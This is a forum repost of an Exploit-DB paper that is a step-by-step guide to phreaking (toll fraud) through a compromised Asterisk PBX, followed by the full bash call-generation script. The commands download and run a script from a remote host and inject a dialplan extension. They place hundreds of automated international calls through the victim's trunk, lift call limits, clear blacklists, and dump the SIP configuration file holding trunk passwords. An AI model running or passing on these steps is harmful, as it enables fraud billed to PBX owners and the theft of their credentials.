Exploit Asterisk Phreaking How-To

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33910
Проверка EDB
  1. Пройдено
Автор
AKRA MACHA
Тип уязвимости
PAPERS
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2014-06-29
Код:
Asterisk Phreaking How-To
	by Akramachamarei

This file shows how to use asterisk to make international calls. All is
done with command line client. A graphical client like Zoiper can be used 
additionally to verify that the endpoint number can be reached.

Required is access to the pbx as asterisk user.

First execute
asterisk -rx 'sip show peers'

sample output
Name/username Host Dyn Forcerport ACL Port Status Description
1741240560	10.200.7.157  N 5060 OK (49 ms)
201/201    (Unspecified)  D N A  0 UNKNOWN
202/202    (Unspecified)  D N A  0 UNKNOWN
203/203    (Unspecified)  D N A  0 UNKNOWN
204/204    (Unspecified)  D N A  0 UNKNOWN
205        (Unspecified)  D N A  0 UNKNOWN
STXSIP     10.200.7.157   N 5060 OK (44 ms)

...to view the active peers connected. The peers at top show the caller 
ids we will use for the auto dial call file. At bottom the trunks are 
listed, there are two types of trunks, inbound and outbound. We are 
interested in the outbound trunks to place calls.

We will use the shell script at the end of this tutorial to place automated
calls.

Now we have to fetch the call.sh script to the asterisk pbx.

Command
wget -O /tmp/c.sh <ip>/call.sh;chmod a+x /tmp/c.sh;/tmp/c.sh add;asterisk \
-rx 'dialplan reload';asterisk -rx 'manager reload'

...will download call.sh from <ip>, save it to /tmp/c.sh. Then it will call 
the add function of the shell script to add a new extension to /etc/
asterisk/extensions.conf.

the new extension is

[calloutnow]
echo "exten => 100,1,Wait(999999999)

which just waits until the call is hung up. then the command reloads the 
dialplan and manager to activate the new extension.

now we are ready to make calls.

this is the command layout
/tmp/c.sh slow <number of calls> <callerid> NULL <number of seconds between
 calls> <delay before the calls are placed> <trunk with destination number>

here is an example command to place a test call
/tmp/c.sh slow 1 205 NULL 15 1 SIP/STXSIP/00449999999999

this command will execute 1 call from callerid 205 at an interval of 15 
seconds to trunk STXSIP and destination number 00449999999999. Normally 
it's ok to use the 00 prefix for the calls, I haven't seen a pbx that 
doesn't change the prefix automatically.

to see if the place succeeds we look into the asterisk log file located at
/var/log/asterisk/full

Command
tail -30 /var/log/asterisk/full

...will show log like
[2014-02-14 07:47:05] VERBOSE[30266] pbx_spool.c:     -- Attempting call on 
SIP/STXSIP/00449999999999 for 100@calloutnow3:1 (Retry 1)
[2014-02-14 07:47:05] VERBOSE[30266][C-00003930] netsock2.c:   == Using SIP 
RTP TOS bits 184
[2014-02-14 07:47:05] VERBOSE[30266][C-00003930] netsock2.c:   == Using SIP 
RTP CoS mark 5
[2014-02-14 07:47:16] VERBOSE[30266][C-00003930] pbx.c:     -- Executing [
100@calloutnow3:1] Wait("SIP/STXSIP-00003941", "999999999") in new stack

this indicates a successful connection to the number. We can see this 
by the line Wait("SIP/STXSIP-00003941", "999999999") entry.

If the log file still shows this line after some seconds and not an error 
that it hung up the call then we can be sure that the line calls stable.

After we have assured the call goes to the destination we can place more 
calls to the number.

Command
/tmp/c.sh slow 200 205 NULL 15 1 SIP/STXSIP/00449999999999

calls the destination 200 times with an interval delay of 15 seconds.

we always can view the call queue is running by looking into the asterisk 
outgoing spool path /var/spool/asterisk/outgoing.

Simply with
ls -la /var/spool/asterisk/outgoing

We can stop upcoming calls by deleting the queue.

Simply with
rm /var/spool/asterisk/outgoing/*

Individual calls can be hung up with

asterisk -rx 'core show channels concise'

this will show the channel name of the call at the left side and

asterisk -r -x 'channel request hangup <channel name>'

hangs up the call.

Some asterisks have limits configured. There are two types of limits, 
limits bound to the callerid and limits for the maximum outbound calls for 
the trunk.

we can see if there are limits for the callerid with

asterisk -rx 'sip show inuse'

the limit column with value 2147483647 means unlimited calls.

we can see the outbound trunk limit with

grep OUTMAXCHANS /etc/asterisk/*

empty entries mean unlimited outbound calls for the asterisk pbx we have 
access to, it does not show and we cannot manipulate the outbound call 
limit of the trunk peer.

we can set limits for callerids by

asterisk -rx "database put AMPUSER <callerid>/concurrency_limit 9999999"

will set <callerid> concurrency call limit to a high value.

we can set outbound trunk limits with the sed command to change 
extensions_additonal.conf, you should backup this file before doing so.

sed -i.bak 's/OUTMAXCHANS_1 =\ 5/OUTMAXCHANS_1 =/g' /etc/asterisk/ \
extensions_additional.conf
asterisk -rx 'dialplan reload';asterisk -rx 'manager reload'

these commands will change OUTMAXCHANS_1 setting from 5 to unlimited and 
reload asterisk dialplan and manager.

finally when a callerid is blacklisted by the pbx we can recover the 
callerid with

asterisk -rx 'database del blacklist <callerid>'

one useful command is
cat /etc/asterisk/sip_additional.conf
it dumps callerids and trunks with passwords.

attached is the call.sh script for your pleasure.

Happy Calls and Stay safe!

#!/bin/bash

#***************************************************************#
#                     generateCalls.sh                          #
#                  written by: Sam Rausch                       #
#                    [email protected]                        #
#                       version 0.1                             #
#                  written October 21, 2011                     #
#***************************************************************#
#                                                               #
# assumes presence of Asterisk already configured               #
# + with a spool path at /var/spool/asterisk/outgoing           #
# + with an 'autodialer' context configured as follows          #
#                                                               #
# [autodialer]                                                  #
# exten => 100,1,Playback(some-foo-goes-here)                   #
# exten => 100,2,Wait(1)                                        #
# exten => 100,3,Playback(goodbye)                              #
# exten => 100,4,Hangup                                         #
#                                                               #
# this script has two functions                                 #
# + fast() will generate calls at a fixed $callsPerSecond rate  #
# + slow() will generate calls with a fixed $intercallDelay     #
#                                                               #
# if you find this script useful, consider dropping             #
# me a note to say thanks.  i don't want beer money             #
# and i don't have an Amazon wishlist ;-)                       #
# if you're inclined to compensate me monetarily,               #
# please make a donation to:                                    #
#                                                               #
# -= http://www.donors1.org/contribute =-                       #
#                                                               #
# this script is free to redistribute as long as                #
# everything above remains intact                               #
#                                                               #
# if you remove my name and take credit for the script          #
# rabid space cats will come to your house and                  #
# speedhump your legs until you beg for mercy...                #
# ...please don't make me send my space cats                    #
#                                                               #
#***************************************************************#

asteriskSpoolPath=/var/spool/asterisk/outgoing

add ()
{
echo "[calloutnow]" >> /etc/asterisk/extensions.conf
echo "exten => 100,1,Wait(999999999)"  >> /etc/asterisk/extensions.conf
echo ok
exit 0
}

#-----------------------------------------------------------------------------#
# fast ()                                                                     #
# generates .call files for use by Asterisk                                   #
# Parameters: numcalls, callingParty, calledParty, callsPerSecond, startDelay #
#-----------------------------------------------------------------------------#
fast ()
{
# prompt for values if not given on the CLI
if [ -z "$2" ]
then
  echo
  echo "<---------------------------------------------------------------------------->"
  echo "Oops, I don't know enough to place your calls."
  echo "Please tell me more about what you'd like to do"
  echo "using the following format:"
  echo
  echo "generateCalls <numCalls> <callingParty> <calledParty> <callsPerSecond> <startDelay>"
  echo
  echo "<numCalls> = total number of calls to generate"
  echo "<callingParty> = phone number originating the calls expressed as xxxxxxxxxx"
  echo "<calledParty> = phone number terminating the calls expressed as xxxxxxxxxx"
  echo "<callsPerSecond> = number of calls placed per second, if the same as
  echo "                   <numCalls> then all calls will be placed simultaneously"
  echo "<startDelay> = delay after executing script for calls to start expressed in seconds
  echo
  echo "I'll be creating your .call files in $(pwd)"
  echo "then moving them to the default Asterisk spool path"
  echo "/var/spool/asterisk/outgoing/"
  echo
  echo "If you'ld like them to go somewhere else, you'll need to"
  echo "edit this script"
  echo "<---------------------------------------------------------------------------->"
  echo 
  exit 0
else
 let numCalls=$1
 callingParty="$2"
 calledParty="$3"
 let callsPerSecond=$4
 let startDelay=$5
 channel="$6"
fi

# Output the values for visual confirmation
echo  "You want to make $numCalls calls"
echo  "You want to call from $callingParty"
echo  "You want to call to $calledParty"
echo  "You want to place $callsPerSecond calls per second"
echo  "You want to wait $startDelay seconds before the first call"
echo  "You want to call from channel $channel"
echo

# Generate the .call files
let callsPerSecondReference=$callsPerSecond
let second=$startDelay
while [ "$numCalls" -gt 0 ]
do
  let callsPerSecond=$callsPerSecondReference
  while [ "$callsPerSecond" -gt 0 ]
  do
    echo "Channel: $channel" > testcall$numCalls.call
    echo "CallerID: \"CLI\"<$callingParty>" >> testcall$numCalls.call
    echo "Context: calloutnow" >> testcall$numCalls.call
    echo "Extension: 100" >> testcall$numCalls.call
    echo "Priority: 1" >> testcall$numCalls.call
    touch -r testcall$numCalls.call -d "+$second sec" testcall$numCalls.call
#    touch -t "$month$day$hour$minute.$second" testcall$numCalls.call
    let "numCalls -= 1"
    let "callsPerSecond -= 1"
  done
  let "second += 1"
done

# Move the .call files to the default Asterisk outgoing path
echo "Your calls will start in $startDelay seconds"
mv *.call /var/spool/asterisk/outgoing/

# Remind the user to answer their phone
echo Answer your phone!!!

# Now go away...
exit 0
}

#-----------------------------------------------------------------------------#
# slow ()                                                                     #
# generates .call files for use by Asterisk                                   #
# Parameters: numcalls, callingParty, calledParty, intercallDelay, startDelay #
#-----------------------------------------------------------------------------#
slow ()
{
# prompt for values if not given on the CLI
if [ -z "$2" ]
then
  echo
  echo "<---------------------------------------------------------------------------->"
  echo "Oops, I don't know enough to place your calls."
  echo "Please tell me more about what you'd like to do"
  echo "using the following format:"
  echo
  echo "generateCalls <numCalls> <callingParty> <calledParty> <intercallDelay> <startDelay>"
  echo
  echo "<numCalls> = total number of calls to generate"
  echo "<callingParty> = phone number originating the calls expressed as xxxxxxxxxx"
  echo "<calledParty> = phone number terminating the calls expressed as xxxxxxxxxx"
  echo "<intercallDelay> = number of seconds between calls"
  echo "<startDelay> = delay after executing script for calls to start expressed in seconds"
  echo "               You'll want to add 10 sec for every 1,000 files you want to generate"
  echo "I'll be creating your .call files in $(pwd)"
  echo "then moving them to the default Asterisk spool path"
  echo "/var/spool/asterisk/outgoing/"
  echo
  echo "If you'ld like them to go somewhere else, you'll need to"
  echo "edit this script"
  echo "<---------------------------------------------------------------------------->"
  echo 
  exit 0
else
 let numCalls=$1
 callingParty="$2"
 let intercallDelay=$3
 let startDelay=$4
 channel="$5"
fi

# Output the values for visual confirmation
echo  "You want to make $numCalls calls"
echo  "You want to call from $callingParty"
echo  "You want to call to $channel"
echo  "You want to wait $intercallDelay seconds between calls"
echo  "You want to wait $startDelay seconds before the first call"
echo

# Generate the .call files
let second=$startDelay
while [ "$numCalls" -gt 0 ]
do
  echo "Channel: $channel" > testcall$numCalls.call
  echo "CallerID: \"CLI\"<$callingParty>" >> testcall$numCalls.call
  echo "Context: calloutnow" >> testcall$numCalls.call
  echo "Extension: 100" >> testcall$numCalls.call
  echo "Priority: 1" >> testcall$numCalls.call
  touch -r testcall$numCalls.call -d "+$second sec" testcall$numCalls.call
  let "numCalls -= 1"
  let second=$second+$intercallDelay
done

# Move the .call files to the default Asterisk outgoing path
echo "Your calls will start in $startDelay seconds"
mv *.call /var/spool/asterisk/outgoing/

# Remind the user to answer their phone
echo Answer your phone!!!

# Now go away...
exit 0
}

help ()
{
echo
echo
echo "****************************************************************"
echo
echo " this script has two functions                                  "
echo " + fast() will generate calls at a fixed callsPerSecond rate    "
echo " + slow() will generate calls with a fixed intercallDelay       "
echo                                                                
echo " if you find this script useful, consider dropping              "
echo " me a note to say thanks.  i don't want beer money              "
echo " and i don't have an Amazon wishlist ;-)                        "
echo " if you're inclined to compensate me monetarily,                "
echo " please make a donation to:                                     "
echo "                                                                "     
echo " -= http://www.donors1.org/contribute =-                        "   
echo "                                                                "  
echo " this script is free to redistribute as long as                 " 
echo " everything above remains intact                                "
echo "                                                                "
echo " if you remove my name and take credit for the script           "
echo " rabid space cats will come to your house and                   "
echo " speedhump your legs until you beg for mercy...                 "
echo " ...please don't make me send my space cats                     "
echo
echo "****************************************************************"
echo 
echo "generateCalls fast <numCalls> <callingParty> <calledParty> <callsPerSecond> <startDelay>"
echo "     numCalls       = total number of calls to generate"
echo "     callingParty   = phone number originating the calls expressed as xxxxxxxxxx"
echo "     calledParty    = phone number terminating the calls expressed as xxxxxxxxxx"
echo "     callsPerSecond = number of calls placed per second, if the same as"
echo "                      numCalls then all calls will be placed simultaneously"
echo "     startDelay     = delay after executing script for calls to start expressed in seconds"
echo
echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
echo
echo "generateCalls slow <numCalls> <callingParty> <calledParty> <intercallDelay> <startDelay>"
echo "     numCalls       = total number of calls to generate"
echo "     callingParty   = phone number originating the calls expressed as xxxxxxxxxx"
echo "     calledParty    = phone number terminating the calls expressed as xxxxxxxxxx"
echo "     intercallDelay = number of seconds between calls"
echo "     startDelay     = delay after executing script for calls to start expressed in seconds"
echo "                      You'll want to add 10 sec for every 1,000 files you want to generate"
echo
echo
exit 0
}

# need this line to call the function passed from the CLI
# because bash is too stupid to let me define functions
# locally to override what's in .bashrc
"$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"

exit 0
 
Источник
www.exploit-db.com

Похожие темы